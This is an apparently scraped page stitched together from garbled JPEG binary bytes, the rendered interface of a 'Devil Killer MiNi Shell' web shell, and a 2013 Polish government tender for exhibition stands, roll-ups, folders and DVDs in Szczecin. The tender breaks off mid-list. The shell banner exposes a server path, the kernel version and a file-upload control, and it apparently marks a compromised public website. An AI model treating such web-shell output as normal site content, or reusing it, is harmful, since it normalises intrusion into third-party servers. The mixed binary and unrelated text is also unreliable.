JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131001/397798-N-2013.html

<p class="kh_header"><b>Szczecin: Wykonanie i dostarczenie wyposażenia stoisk oraz materiałów promocyjnych w ramach projektów finansowanych ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Warszawie - Znak sprawy: WOF.261.22.2013</b><br>
<b>Numer ogłoszenia: 397798 - 2013; data zamieszczenia: 01.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Ochrony Środowiska w Szczecinie , ul. Jagiellońska 32, 70-382 Szczecin, woj. zachodniopomorskie, tel. 91 4305200, faks 91 4305229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szczecin.rdos.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i dostarczenie wyposażenia stoisk oraz materiałów promocyjnych w ramach projektów finansowanych ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Warszawie - Znak sprawy: WOF.261.22.2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostarczenie wyposażenia stoisk oraz materiałów promocyjnych w ramach projektów finansowanych ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Warszawie (dalej NFOŚiGW) w podziale na cztery zadania.  Zamawiający dopuszcza składanie ofert częściowych na wszystkie zadania lub na każde z następujących zadań:
Zadanie 1 - wykonanie i dostarczenie 3 szt. ścianek wystawienniczych 
Zadanie realizowane w ramach Projektu Bliżej Natury - Tropem wilka i żubra dofinansowanego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie. Charakterystyka przedmiotu zamówienia: kod CPV 22462000-6; konstrukcja ścianki: anodowe elementy aluminiowe oraz kostki łączące poszczególne elementy konstrukcyjne aluminiowe, łukowa; wymiary: 3x3 m; ścianka pięciomodułowa: 3 bryły środkowe + 2 bryły boczne; nadruk: zawierał będzie nazwę i LOGO Zamawiającego oraz dane teleadresowe, informację o dofinansowaniu ze środków NFOŚiGW wraz z LOGO Funduszu, tytuł projektu, w ramach którego wykonano ściankę, tło będą stanowiły fotografie wilka i żubra - Zamawiający dostarczy Wykonawcy fotografie (schemat nadruku na ściance wystawienniczej - załącznik nr 6 do SIWZ). Wykonawca wykona 3 projekty grafiki, z których Zamawiający wybierze jeden; Zamawiający zastrzega sobie prawo wprowadzania w zaakceptowanym projekcie poprawek; wyposażenie uzupełniające: konstrukcja ścianki po złożeniu pakowana w kufer transportowy służący również jako tzw. trybunka z wierzchnim blatem, każda ścianka pakowana w osobny kufer; montaż grafiki: poprzez listwy magnetyczne i uchwyty; panel grafiki: wykonany z materiału tekstylnego; nadruk na panelu: grafika wypełnienia 100%, full kolor, obydwie strony ścianki, nadruk dotyczy również trybunki; grafika zabezpieczona laminatem przed uszkodzeniem (obejmuje uszkodzenia mechaniczne, uszkodzenia na skutek warunków atmosferycznych, itp.); oświetlenie: minimum dwie lampki halogenowe montowane przy górnej krawędzi ścianki; termin realizacji do 2 tygodni od podpisania umowy, dostawa wraz z wniesieniem na adres: Regionalna Dyrekcja Ochrony Środowiska w Szczecinie Wydział Spraw Terenowych w Złocieńcu ul. Dworcowa 13, 78-520 Złocieniec, tel. 94 36 70 920.
Zadanie 2 - wykonanie i dostarczenie 12 szt. roll-up 
Zadanie realizowane w ramach Projektu Bliżej Natury - Tropem wilka i żubra dofinansowanego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie. Charakterystyka przedmiotu zamówienia: wykonanie i dostarczenie 12 sztuk roll-up, w tym: roll-up typ I  z tzw. główkami - 6 sztuk, w tym: 3 roll-upy przedstawiające żubry oraz 3 roll-upy przedstawiające wilki, wycięcie owalnego otworu w miejscu łba zwierzęcia (żubra lub wilka) na tzw. główkę umożliwiającą wykonanie zdjęcia pamiątkowego, na którym twarz fotografowanej osoby będzie wpisana w postać wilka lub żubra, rozmiar otworu powinien być dostosowany do ludzkiej twarzy, wysokość umieszczenia otworu będzie uzależniona od zdjęcia zastosowanego w tle;
roll-up typ II bez tzw. główek - 6 sztuk, w tym: 3 roll-upy przedstawiające żubry oraz 3 roll-upy przedstawiające wilki,
Opis ogólny dla roll-up typ I  z tzw. główkami oraz roll-up typ II bez tzw. główek: panel grafiki: wykonany z materiału tekstylnego półbłyszczącego lub matowego; nadruk na panelu: grafika wypełnienia 100%, full kolor, jednostonny; grafika wykonana w technice odpornej na uszkodzenia (uszkodzenia mechaniczne, uszkodzenia na skutek warunków atmosferycznych, itp.); maszt: składany dwu lub trzyczęściowy z regulowaną wysokością w zakresie 160-220 cm, aluminiowy; mocowanie grafiki: listwa zatrzaskowa aluminiowa, umożliwiająca łatwą wymianę grafiki; rozmiar panelu grafiki: 100 cm x 200 cm; nadruk zawierał będzie nazwę i LOGO Zamawiającego oraz dane teleadresowe, informację o dofinansowaniu ze środków NFOŚiGW wraz z LOGO Funduszu, tytuł projektu w ramach którego wykonano roll-upy, tło będą stanowiły fotografie wilka lub żubra - Zamawiający dostarczy Wykonawcy fotografie, (schemat nadruku na roll-up - załącznik nr 7 do SIWZ); Wykonawca wykona 3 projekty grafiki, z których Zamawiający wybierze jeden; Zamawiający zastrzega sobie prawo wprowadzania w zaakceptowanym projekcie poprawek; kaseta z aluminium z 2 nogami stanowiąca podstawę stojaka, z mechanizmem samozwijającym; waga pojedynczego roll-upu zapakowanego w torbę transportową do 8 kg; torba transportowa/futerał (osobna na każdy roll-up); termin realizacji do 2 tygodni od dnia podpisania umowy; dostawa wraz z wniesieniem na adres: Regionalna Dyrekcja Ochrony Środowiska w Szczecinie Wydział Spraw Terenowych w Złocieńcu, ul. Dworcowa 13,78-520 Złocieniec, tel. 94 36 70 920; kod CPV 22462000-6; 
Zadanie 3 - opracowanie graficzne, przygotowanie do druku oraz druk folderów ścieżka przyrodnicza Kamienna Buczyna oraz ścieżka przyrodnicza Łąki Studnickie 
Zadanie realizowane w ramach Projektu Doposażenie bazy edukacyjnej RDOŚ w Szczecinie dofinansowanego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie.
Charakterystyka przedmiotu zamówienia: kod CPV 22462000-6
Opracowanie graficzne folderów: opracowanie graficzne folderów obejmie wykonanie przez Wykonawcę projektu graficznego folderów wraz z autorskimi elementami graficznymi, a także komputerowy skład i łamanie oraz przygotowanie do druku folderów w języku polskim zgodnie z Zasadami składu tekstów w języku polskim (PN-83/P-55366); projekty graficzne folderów Ścieżka przyrodnicza Kamienna Buczyna oraz Ścieżka przyrodnicza Łąki Studnicki należy wykonać w podobnej stylistyce (układ treści, kolorystyka, rodzaj czcionki, itp.) tak aby wizualnie stanowiły komplet; Zamawiający w ramach umowy dostarczy Wykonawcy poglądowe mapy przebiegu ścieżek oraz dokumentację fotograficzną obrazującą sytuację przyrodniczą i zasoby dydaktyczne ścieżek; Wykonawca przeprowadzi niezbędną obróbkę graficzną otrzymanych materiałów w celu uzyskania jak najwyższej jakości estetycznej folderów; elementy graficzne folderów będą stanowiły ok. 70% ich objętości; udostępnione przez Zamawiającego materiały fotograficzne i mapy, a także elementy graficzne opracowane na potrzeby folderów nie mogą być wykorzystywane w całości ani w części do innych publikacji przygotowywanych przez Wykonawcę dla osób trzecich; Wykonawca przed przystąpieniem do prac związanych z przygotowaniem do druku folderów przedstawi Zamawiającemu do akceptacji ich projekty graficzne; majątkowe prawa autorskie do projektów graficznych folderów, w tym rysunków i innej grafiki, przechodzą w całości na Regionalną Dyrekcję Ochrony Środowiska w Szczecinie (dalej RDOŚ) na wszystkich polach eksploatacji niezbędnych dla korzystania z nich. Przenoszone majątkowe prawa autorskie nie będą w chwili przejścia na RDOŚ obciążone prawami na rzecz osób trzecich, a także osoby uprawnione z tytułu osobistych praw autorskich nie będą wykonywać takich praw w stosunku do RDOŚ lub jej następców prawnych. Z chwilą przejścia na RDOŚ w Szczecinie majątkowych praw autorskich do projektów graficznych folderów, RDOŚ w Szczecinie udzieli nieodpłatnie NFOŚiGW licencji na czas nieokreślony do nieodpłatnego korzystania z projektów folderów zgodnie z ustaleniami zawartymi  w umowie pomiędzy RDOŚ w Szczecinie i NFOŚiGW  o realizację ww. zadania; żadna osoba fizyczna lub prawna nie będzie zgłaszała roszczeń w stosunku do Zamawiającego oraz NFOŚiGW z tytułu praw autorskich projektów użytych lub powstałych w związku z realizacją zadania. Wykonawca we własnym zakresie ureguluje sprawy związane z prawem autorskim użytych elementów graficznych.
Przygotowanie do druku oraz druk folderów: Wykonawca zapewni druk folderów w polskiej wersji językowej; nakład: folder ścieżki przyrodniczej Kamienna Buczyna 3000 szt., folder ścieżki przyrodniczej Łąki Studnickie 3000 szt.; format: A4 (297x210), składane w Z do DL; papier: kreda błyszcząca, 150 g; kolor: 4+4; uszlachetnienia: zabezpieczenie lakier offset - dwustronnie; Wykonawca przedstawi Zamawiającemu przed drukiem do akceptacji próbny wydruk full color obu folderów; wydrukowane foldery zostaną dostarczone i wniesione na adres: Regionalna Dyrekcja Ochrony Środowiska w Szczecinie Wydział Spraw Terenowych w Złocieńcu, ul. Dworcowa 13,  78-520 Złocieniec, tel. 94 36 70 920; termin realizacji: do 2 tygodni od dnia podpisania umowy;
Zadanie 4 - dostawa 32 płyt DVD wraz z opakowaniami
 Zadanie realizowane w ramach Projektu Bliżej Natury - Tropem wilka i żubra dofinansowanego przez Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej w Warszawie. Charakterystyka przedmiotu zamówienia: kod CPV 22462000-6, 30234400-2; 32 płyt DVD z opakowaniami; pudełka otwierane - ilość 32 szt. (każda z płyt będzie osobno opakowana), wykonane z kolorowego (np. czarnego) lub bezbarwnego tworzywa, elastycznego i trudnołamliwego, z możliwością umieszczenia drukowanej okładki; wielkość pudełka: 12,8 cm x 12,5 cm; grubość grzbietu pudełka 5 mm lub wymiary zbliżone, umożliwiające bezpieczne przechowywanie płyty; płyta o pojemności min. 4,7 GB, x 16,120 min; powierzchnia płyty bez nadruków; termin realizacji do 2 tygodni od dnia podpisania umowy; dostawa wraz z wniesieniem na adres: Regionalna Dyrekcja Ochrony Środowiska w Szczecinie Wydział Spraw Terenowych w Złocieńcu, ul. Dworcowa 13,  78-520 Złocieniec, tel. 94 36 70 920.
Podane przez Zamawiającego ewentualne nazwy (znaki towarowe), mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu, przy czym Zamawiający dopuszcza składanie ofert równoważnych w zakresie sporządzonego opisu przedmiotu zamówienia. Przedmiot zamówienia określono poprzez wskazanie obiektywnych cech technicznych i jakościowych oraz standardów, dla których określenia dopuszcza się wskazanie przykładowych znaków towarowych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 30.23.44.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek określony w art. 22 ust. 1 pkt 1 ustawy, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;Z uwagi na to, iż obowiązujące przepisy prawa nie nakładają obowiązku posiadania uprawnień do wykonywania działalności lub czynności będących przedmiotem zamówienia warunek ten będzie spełniony przez każdego z Wykonawców</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek określony w art. 22 ust. 1 pkt 2 ustawy, dotyczący posiadania wiedzy i doświadczenia; Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek określony w art. 22 ust. 1 pkt 3 ustawy, dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek określony w art. 22 ust. 1 pkt 3 ustawy, dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek określony w art. 22 ust. 1 pkt. 4 ustawy, dotyczący sytuacji ekonomicznej i finansowej;  Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	 Zamawiający dopuszcza możliwość dokonania zmian postanowień umowy w stosunku do treści oferty w przypadkach i na warunkach określonych w pkt 2-5.
2.	 Zmiana terminu wykonania umowy będzie możliwa w następujących okolicznościach: 
1)	 wystąpienia siły wyższej, np.: wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć ani mu zapobiec, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
2)	 zmiany obowiązujących przepisów prawa, która stanowi przeszkodę w rozpoczęciu, lub kontynuowaniu wykonania przedmiotu zamówienia;
3)	 wystąpienia nadzwyczajnych i niesprzyjających warunków atmosferycznych.
3. 	W przypadku zaistnienia okoliczności, o których mowa w pkt.2, termin na wykonanie umowy zostanie wydłużony o czas trwania przeszkody, uniemożliwiającej wykonanie przedmiotu umowy, lub na okres zaakceptowany przez obie Strony umowy.
4. 	Jeżeli w toku wykonywania umowy Wykonawca stwierdzi zaistnienie okoliczności, które dają podstawę do oceny, że wystąpiły okoliczności opisane w pkt. 2, w związku z czym przedmiot umowy nie zostanie wykonany w terminie określonym w umowie, niezwłocznie pisemnie powiadomi Zamawiającego o niebezpieczeństwie wystąpienia opóźnienia w wykonaniu zamówienia, wskazując prawdopodobny czas opóźnienia i jego przyczynę.
5. 	Zmiana umowy w zakresie wynagrodzenia będzie możliwa w okoliczności rezygnacji przez Zamawiającego z wykonania części przedmiotu zamówienia, nieprzekraczających 20% kwoty brutto podanej w ofercie Wykonawcy na skutek:
1)	 wystąpienia siły wyższej;
2)	 zmiany obowiązujących przepisów prawa, która stanowi przeszkodę w wykonaniu części przedmiotu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://szczecin.rdos.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalna Dyrekcja Ochrony Środowiska w Szczecinie, ul. Jagiellońska 32, 70-382 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2013 godzina 10:00, miejsce: Regionalna Dyrekcja Ochrony Środowiska w Szczecinie, ul. Jagiellońska 32, 70-382 Szczecin, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - wykonanie i dostarczenie 3 szt. ścianek wystawienniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka przedmiotu zamówienia:
a)	 kod CPV 22462000-6; 
b)	 konstrukcja ścianki: anodowe elementy aluminiowe oraz kostki łączące poszczególne elementy konstrukcyjne aluminiowe, łukowa;
c)	 wymiary: 3x3 m; 
d)	 ścianka pięciomodułowa: 3 bryły środkowe + 2 bryły boczne;
e)	 nadruk: zawierał będzie nazwę i LOGO Zamawiającego oraz dane teleadresowe, informację o dofinansowaniu ze środków NFOŚiGW wraz z LOGO Funduszu, tytuł projektu, w ramach którego wykonano ściankę, tło będą stanowiły fotografie wilka i żubra - Zamawiający dostarczy Wykonawcy fotografie (schemat nadruku na ściance wystawienniczej - załącznik nr 6 do SIWZ). Wykonawca wykona 3 projekty grafiki, z których Zamawiający wybierze jeden; Zamawiający zastrzega sobie prawo wprowadzania w zaakceptowanym projekcie poprawek; 
f)	 wyposażenie uzupełniające: konstrukcja ścianki po złożeniu pakowana w kufer  transportowy służący również jako tzw. trybunka z wierzchnim blatem, każda ścianka pakowana w osobny kufer;
g)	 montaż grafiki: poprzez listwy magnetyczne i uchwyty;
h)	 panel grafiki: wykonany z materiału tekstylnego;
i)	 nadruk na panelu: grafika wypełnienia 100%, full kolor, obydwie strony ścianki, nadruk dotyczy również trybunki;
j)	 grafika zabezpieczona laminatem przed uszkodzeniem (obejmuje uszkodzenia mechaniczne, uszkodzenia na skutek warunków atmosferycznych, itp.);
k)	 oświetlenie: minimum dwie lampki halogenowe montowane przy górnej krawędzi ścianki;
l)	 termin realizacji do 2 tygodni od podpisania umowy,
m)	 dostawa wraz z wniesieniem na adres: Regionalna Dyrekcja Ochrony Środowiska w Szczecinie Wydział Spraw Terenowych w Złocieńcu ul. Dworcowa 13,  78-520 Złocieniec, tel. 94 36 70 920.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - wykonanie i dostarczenie 12 szt. roll-up.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystyka przedmiotu zamówienia:
A.	 wykonanie i dostarczenie 12 sztuk roll-up, w tym:
a)	 roll-up typ I  z tzw. główkami- 6 sztuk, w tym:
-	 3 roll-upy przedstawiające żubry oraz 3 roll-upy przedstawiające wilki,
